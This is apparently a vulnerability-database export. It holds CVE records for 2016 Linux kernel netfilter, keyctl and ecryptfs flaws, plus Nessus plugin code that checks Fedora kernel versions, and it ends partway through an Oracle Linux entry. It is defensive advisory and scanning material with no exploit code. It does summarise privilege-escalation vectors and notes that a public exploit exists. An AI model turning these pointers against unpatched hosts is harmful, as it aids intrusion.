{"cve": [{"lastseen": "2021-02-02T06:28:08", "description": "The IPT_SO_SET_REPLACE setsockopt implementation in the netfilter subsystem in the Linux kernel before 4.6 allows local users to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from kernel heap memory by leveraging in-container root access to provide a crafted offset value that leads to crossing a ruleset blob boundary.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.1, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2016-07-03T21:59:00", "title": "CVE-2016-4998", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4998"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:linux:linux_kernel:4.5.5", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:oracle:linux:7", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-4998", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4998", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", 
"cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:08", "description": "The compat IPT_SO_SET_REPLACE and IP6T_SO_SET_REPLACE setsockopt implementations in the netfilter subsystem in the Linux kernel before 4.6.3 allow local users to gain privileges or cause a denial of service (memory corruption) by leveraging in-container root access to provide a crafted offset value that triggers an unintended decrement.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-03T21:59:00", "title": "CVE-2016-4997", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4997"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_live_patching:12.0", "cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:linux:linux_kernel:4.6.2", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", 
"cpe:/o:novell:suse_linux_enterprise_module_for_public_cloud:12.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:12.0", "cpe:/o:oracle:linux:7", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-4997", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4997", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_module_for_public_cloud:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_live_patching:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:07", "description": "The key_reject_and_link function in security/keys/key.c in the Linux kernel through 4.6.3 does not ensure that a certain data structure is 
initialized, which allows local users to cause a denial of service (system crash) via vectors involving a crafted keyctl request2 command.\nCWE-416: Use After Free (http://cwe.mitre.org/data/definitions/416.html)", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-06-27T10:59:00", "title": "CVE-2016-4470", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4470"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:vm_server:3.4", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.0", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:redhat:enterprise_mrg:2.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:12.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_for_real_time:7.0", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:oracle:linux:5.0", "cpe:/o:linux:linux_kernel:4.6.3", 
"cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2016-4470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4470", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_for_real_time:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:enterprise_mrg:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:03", "description": "The ecryptfs_privileged_open function in fs/ecryptfs/kthread.c in the Linux kernel before 4.6.3 allows local users to gain privileges or cause a denial of service (stack memory consumption) via vectors involving crafted mmap calls for /proc pathnames, leading to recursive pagefault handling.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": 
"2016-06-27T10:59:00", "title": "CVE-2016-1583", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1583"], "modified": "2018-12-06T22:29:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_live_patching:12.0", "cpe:/o:novell:suse_linux_enterprise_server:11.0", "cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:linux:linux_kernel:4.6.2", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:novell:suse_linux_enterprise_debuginfo:11.0", "cpe:/o:novell:suse_linux_enterprise_module_for_public_cloud:12", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/a:novell:suse_linux_enterprise_software_development_kit:11.0", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-1583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1583", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_module_for_public_cloud:12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.6.2:*:*:*:*:*:*:*", 
"cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:extra:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_debuginfo:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:a:novell:suse_linux_enterprise_software_development_kit:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_live_patching:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}], "android": [{"lastseen": "2020-06-22T14:42:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-4470"], "description": "The key_reject_and_link function in security/keys/key.c in the Linux kernel through 4.6.3 does not ensure that a certain data structure is initialized, which allows local users to cause a denial of service (system crash) via vectors involving a crafted keyctl request2 command.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-09-01T00:00:00", "id": "ANDROID:CVE-2016-4470", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-4470.html", "title": "CVE-2016-4470", "type": "android", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:14:19", "description": "The 4.4.14 update contains a number of important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much 
as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-20T00:00:00", "title": "Fedora 22 : kernel (2016-63ee0999e4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1583", "CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998"], "modified": "2016-07-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-63EE0999E4.NASL", "href": "https://www.tenable.com/plugins/nessus/92442", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-63ee0999e4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92442);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n script_xref(name:\"FEDORA\", value:\"2016-63ee0999e4\");\n\n script_name(english:\"Fedora 22 : kernel (2016-63ee0999e4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.4.14 update contains a number of important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-63ee0999e4\"\n );\n script_set_attribute(\n attribute:\"solution\", 
\n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-63ee0999e4\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"kernel-4.4.14-200.fc22\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:14:02", "description": "Rebase to latest upstream 4.6 release, 4.6.3.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-15T00:00:00", "title": "Fedora 24 : kernel (2016-1c409313f4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5728", "CVE-2016-1583", "CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998"], "modified": "2016-07-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-1C409313F4.NASL", "href": "https://www.tenable.com/plugins/nessus/92232", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-1c409313f4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92232);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4997\", \"CVE-2016-4998\", \"CVE-2016-5728\");\n script_xref(name:\"FEDORA\", value:\"2016-1c409313f4\");\n\n script_name(english:\"Fedora 24 : kernel (2016-1c409313f4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to latest upstream 4.6 release, 4.6.3.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly 
from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-1c409313f4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4997\", \"CVE-2016-4998\", \"CVE-2016-5728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-1c409313f4\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"kernel-4.6.3-300.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:02", "description": "Description of changes:\n\nkernel-uek\n[4.1.12-61.1.10.el7uek]\n- netfilter: x_tables: make sure e->next_offset covers remaining blob \nsize (Florian Westphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian \nWestphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n\n[4.1.12-61.1.9.el7uek]\n- xen-blkback: don't get ref for each queue (Bob Liu) [Orabug: \n24616917] - NVMe: Fix obtaining command result (Keith Busch) [Orabug: \n24655742]\n\n[4.1.12-61.1.8.el7uek]\n- Revert 'ixgbe: make a workaround to tx hang issue under dom' (Brian \nMaly) [Orabug: 24618738]\n\n[4.1.12-61.1.7.el7uek]\n- x86/xen: Add x86_platform.is_untracked_pat_range quirk to ignore ISA \nregions. (Konrad Rzeszutek Wilk) [Orabug: 24566046]", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-23T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3619)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-23T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.10.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.10.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": 